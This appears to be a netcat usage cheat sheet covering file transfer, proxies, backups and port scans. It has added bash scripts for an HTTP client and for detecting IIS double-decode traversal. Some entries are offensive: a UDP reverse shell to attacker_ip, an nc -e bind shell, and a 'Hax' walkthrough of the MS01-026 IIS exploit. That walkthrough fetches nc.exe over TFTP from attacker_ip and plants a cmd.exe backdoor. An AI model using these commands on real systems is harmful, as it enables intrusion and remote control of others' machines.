http://www.securitydocs.com/library/3376

=============
nc -h  [v1.10]

connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -e prog                 program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

Note on syntax: the examples below mix two netcats. "nc -l -p port" is the
traditional 1.10 netcat whose help is shown above (and its Debian
netcat-traditional build, which adds -q and -c). "nc -l port" is the OpenBSD
netcat / ncat form; older OpenBSD versions refuse -p together with -l, and
plain 1.10 treats a bare "nc -l 3000" as a hostname filter, not a port. Use
whichever form your nc accepts. Everything nc carries is plaintext and
unauthenticated: anyone who can reach the listening port gets the data (or
the shell).

=============
2 way communication
------------- listening system
nc -l -p 1111
------------- connecting system
nc 127.0.0.1 1111

=============
remote command
------------- RX side
nc -l -p 2000 -q 0 | destcmd
------------- TX side
srccmd | nc -q 0 otherhost 2000
------------- transfer compressed data
nc -l -p 2000 -q 0 | gzip -d | destcmd
srccmd | gzip | nc -q 0 otherhost 2000
----- similar, but authenticated and encrypted
srccmd | ssh user@otherhost destcmd
----- file transfer with tar
... target:
nc -l 3000 | tar xvf -
... source:
tar -cf - . | nc target_ip 3000

=============
www server: fetch a page from it
remote=server
echo -e "GET http://$remote HTTP/1.0\n\n" | nc $remote 80 >/tmp/www.log

=============
www server: serve a canned file and log what clients ask for
cat << EOM > /tmp/www-file
Simple WWW server V-1.0
-----------------------
EOM
# the file is sent as the raw response (no HTTP header); the first 2000 bytes
# of each request are appended to /tmp/requests with a timestamp
while true; do
    cat /tmp/www-file | nc -l -p 1500 | head --bytes 2000 >>/tmp/requests
    echo -e "$(date '+%F %T') =====" >>/tmp/requests
done
-----------------------
basic web server (needs an nc with -c, e.g. Debian netcat-traditional or ncat;
plain 1.10 only has -e, which cannot take a shell command line)
while netcat -lp 8080 -c 'echo HTTP/1.0 200 OK;echo;cat file'; do :; done

=============
generic tcp proxy (logging relay)
infile=/tmp/inflow.$$
outfile=/tmp/outflow.$$
bpipe=/tmp/backpipe.$$
mknod $bpipe p            # a named pipe; "mkfifo $bpipe" is the same thing
port=5900
server=real_server_ip     # where the relay forwards to (localhost only if the
                          # real service listens on a different port)
export infile outfile bpipe port server
nc -l -p $port 0<$bpipe | tee -a $infile | nc $server $port | tee -a $outfile 1>$bpipe
----- the same in front of a web server
nc -l -p 80 0<$bpipe | tee -a $infile | nc $server 80 | tee -a $outfile 1>$bpipe

Requests coming into the proxy from the client arrive at the first nc,
listening on port 80. They are handed to tee, which appends them to the
inflow file, then continue on to the second nc, which hands them to the real
web server. When a response comes back from the server, it arrives at the
second nc, is logged by the second tee to the outflow file, and is then
pushed into the backpipe named pipe on the local filesystem. Since the first
nc reads its stdin from that pipe, the response is handed to the first nc,
which dutifully gives it back to the original client. Each "nc -l" serves a
single connection and then exits, so wrap the line in a loop if more than
one session is wanted; the two log files hold a plaintext copy of both
directions, so protect them accordingly.
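The fetch one-liner above (echo -e "GET http://$remote HTTP/1.0\n\n" | nc ...) works against lenient servers but sends bare LF line endings, an absolute URI and no Host header, and a script has no easy way to act on the result. The following is an added example, not code from the original page: a small bash HTTP/1.0 client on top of netcat-traditional (-w as in the "nc -h" text above), with a parser for the status line. The host, port, path and log file are placeholders, and the sample response is constructed.

```shell
#!/usr/bin/env bash
# Added example, not from the original page. Assumes netcat-traditional 1.10
# ("nc -w secs" as in the help text); host/port/path/log are placeholders.

# Build a well-formed HTTP/1.0 request: CRLF line endings, a relative path,
# a Host header (needed for name-based virtual hosts) and Connection: close,
# instead of the bare "GET http://host HTTP/1.0\n\n" line.
http_request() {
    local host=$1 path=${2:-/}
    printf 'GET %s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n' "$path" "$host"
}

# Pull the numeric status code out of a raw response: second field of the
# first line, with the trailing CR that a real server sends stripped off.
http_status() {
    printf '%s\n' "$1" | head -n 1 | tr -d '\r' | awk '{ print $2 }'
}

# Fetch a page through nc, keep headers+body in a log file, and print the
# status code. -w bounds the connect and the final read; no -q, so nc keeps
# reading until the server closes the connection (Connection: close).
http_get() {
    local host=$1 port=${2:-80} path=${3:-/} log=${4:-/tmp/www.log}
    http_request "$host" "$path" | nc -w 5 "$host" "$port" > "$log"
    http_status "$(cat "$log")"
}

# Constructed sample response so the parser can be exercised offline.
SAMPLE_RESPONSE=$(printf 'HTTP/1.0 302 Found\r\nLocation: http://example.invalid/\r\n\r\nmoved')

# Usage against a real host (placeholders):
#   code=$(http_get webserver_ip 80 /index.html /tmp/www.log)
```

The same request builder also serves the logging proxy above: feed its output into the relay and the inflow file will show exactly the bytes the real server received.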
=============
backup remote system
----- server
cat backup.iso | nc -l 2222
----- client
nc serv_host 2222 > backup.iso
----- monitor progress on both sides (pv: monitor the progress of data through a pipe)
cat backup.iso | pv -b | nc -l 2222
nc serv_host 2222 | pv -b > backup.iso
----- server: raw partition image, compressed
dd if=/dev/hdb7 | gzip -9 | nc -l 2222
----- client
nc serv_host 2222 | pv -b > hdb7partition.img.gz
----- server: tar of /home (-f takes "-" as its argument, so it must be the last bundled flag)
tar -czf - /home | nc -l 2222
----- client
nc serv_host 2222 | pv -b > home.tgz

=============
port scan
nc -vvn -z 10.0.0.1 79-81

=============
shell over UDP 53 (DNS port, often allowed through firewalls; one nc receives
commands, a second one returns the output)
On attacker:
nc -l -u -p 53
On target:
nc -u -l -p 53 | /bin/sh | nc -u attacker_ip 53
From attacker (type commands; output arrives at the listener above):
cat | nc -u target_ip 53

=============
encrypted (cryptcat: netcat with Twofish, same options plus -k key)
Machine A:
cryptcat -l -p 1234 < testfile
Machine B:
cryptcat machineA 1234 > testfile
This is identical to the normal netcat options. Give both sides the same
-k key; without it cryptcat falls back to its built-in default key, which
is public knowledge and protects nothing.

=============
shell redirection (to - from) [nc -e]
----- server (hands the socket straight to bash; anyone who can reach the port gets the shell)
nc -v -e '/bin/bash' -l -p 1234 -t
----- client
telnet 127.0.0.1 1234

=============
port scan
----- TCP (without -v only service banners are shown; nc prints its
"open" / "Connection refused" lines on stderr, so add -v and 2>&1 to see them)
echo EXIT | nc -w 1 127.0.0.1 20-250 500-600 5990-7000
----- UDP (only ports that answer or draw an ICMP unreachable can be told
apart; a filtered port that stays silent looks "open")
nc -u -v -w 1 127.0.0.1 20-250 500-600 5990-7000
----- verbose, sending QUIT to coax banners out of the services
echo QUIT | nc -v -w 5 target 20-250 500-600 5990-7000

=============
Hax
Simple type of IIS exploit that is used in many netcat seminars: the
"..%255c.." double-decode directory traversal (MS01-026). This was patched
like two years ago, but it's lots of fun nonetheless on a lab box. First up,
start netcat:
$ nc -v -n 70.69.68.67 80
where of course the IP address is the IIS server's and 80 is the standard
port for TCP/HTTP. The -v option makes it more verbose (more output, w00t)
and -n means we are giving it a numeric IP address rather than a hostname.
Now once it connects, type this and hit enter:
GET http://70.69.68.67/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
This gets back a standard HTTP response. But wait! It also runs 'dir c:\',
which lists the contents of C:\, Windows' version of /. The trick is that IIS
decoded "%255c" once to "%5c" for its path check and once more to "\" before
use, so the request walks out of /scripts/ and into winnt\system32. Now let's
upload netcat to their pathetic unpatched asses.
Or if you're not a big binary-fetish man, we can just make their server fetch
it instead. Run a TFTP server on your own box (attacker_ip) with nc.exe in
its root, then:
$ nc -v -n 70.69.68.67 80
GET http://70.69.68.67/scripts/..%255c../winnt/system32/cmd.exe?/c+TFTP+-i+attacker_ip+GET+nc.exe
Now let's use netcat to create a backdoor. Remember our pseudo-telnet server?
We want to run this with the nc.exe now sitting on their server:
nc -L -p 1337 -d -e cmd.exe
-L (not -l, -L; Windows nc only) tells netcat to keep listening after a
client disconnects instead of exiting.
-d tells it to detach from the console, so it keeps running without a window.
If we convert that command to a URL it looks like this:
http:///c+nc+-L+-p+1337+-e+cmd.exe
Run that on their machine the same way you ran everything else, by appending
it to the end of the cmd.exe?/ request. If you can't figure that out... you'd
better reread this. There's really a load of stuff you can do to mess with
them. Transfer a file to their computer? Figure that one out; you can put it
together from previous usage examples in this article.

=====
listen on port 6000 to detect attacks on X server (on a box with no X
listening, -v logs every connect to the X port; bind one interface with -s
addr. With 1.10, a hostname/port after -l restricts which remote peer is
accepted, so leave them out to catch everyone)
while true ; do nc -v -l -p 6000 ; done

=====
tar + compress over nc
nc -l -p 1234 | uncompress -c | tar xvfp -
tar cfp - /some/dir | compress -c | nc -w 3 othermachine 1234

=============
opendchub
Hub is up and running. Listening for user connections on port 7065 and
listening for admin connections on port 53696

=====
local port forwarding (again needs an nc with -c; one connection per loop
iteration)
while netcat -lp 8080 -c 'netcat localhost 80'; do :; done

=====
collect messages from exim server
socat -u TCP4-LISTEN:567,reuseaddr,fork OPEN:/tmp/karma.log,creat,append
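The other side of the Hax section above: what the IIS double decoding actually does to "..%255c..", and how to spot such requests in a log. This is an added example, not code from the original page. It reproduces the decode-twice behaviour in plain bash/awk and runs it over a constructed list of request paths (one URI per line, an assumed format, not real IIS log output). It also flags the single-encoded "..%5c.." variant, which the text does not mention but which falls out of the same check.

```shell
#!/usr/bin/env bash
# Added example, not from the original page. The sample paths below are
# constructed; the one-URI-per-line input format is an assumption.

# Plain percent-decoding of one string, in awk so it runs on gawk/mawk/busybox.
# Only the ASCII range matters here; %00 is dropped rather than emitted.
urldecode() {
    printf '%s\n' "$1" | awk '
        BEGIN { for (i = 1; i < 256; i++) chr[sprintf("%02x", i)] = sprintf("%c", i) }
        {
            out = ""
            while (match($0, /%[0-9a-fA-F][0-9a-fA-F]/)) {
                out = out substr($0, 1, RSTART - 1) chr[tolower(substr($0, RSTART + 1, 2))]
                $0 = substr($0, RSTART + 3)
            }
            print out $0
        }'
}

# IIS (before MS01-026) decoded the path once for its security check and once
# more before use, so "%255c" passes the check as "%5c" and executes as "\".
iis_decode() {
    urldecode "$(urldecode "$1")"
}

# Does the path, as IIS finally saw it, climb out of the web root?
is_traversal() {
    case "$1" in
        *../*|*..\\*) return 0 ;;
    esac
    return 1
}

# Does it name cmd.exe (any case)?
names_cmd() {
    case "$1" in
        *[cC][mM][dD].[eE][xX][eE]*) return 0 ;;
    esac
    return 1
}

# Read request URIs from stdin, one per line, and print the ones whose
# double-decoded path both escapes the web root and reaches cmd.exe.
flag_paths() {
    local raw decoded
    while IFS= read -r raw; do
        decoded=$(iis_decode "${raw%%\?*}")      # drop the query string
        if is_traversal "$decoded" && names_cmd "$decoded"; then
            printf '%s -> %s\n' "$raw" "$decoded"
        fi
    done
}

# Constructed sample: the two attack requests from the text (double-encoded
# and single-encoded) between two benign hits.
SAMPLE_PATHS='/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/index.html
/scripts/..%5c../winnt/system32/cmd.exe?/c+TFTP+-i+attacker_ip+GET+nc.exe
/images/logo.gif'

# Usage: printf '%s\n' "$SAMPLE_PATHS" | flag_paths
```

Decoding twice before matching is the point: a pattern that looks for a literal "../" in the raw request line misses "%255c" entirely, and one that only decodes once still misses it.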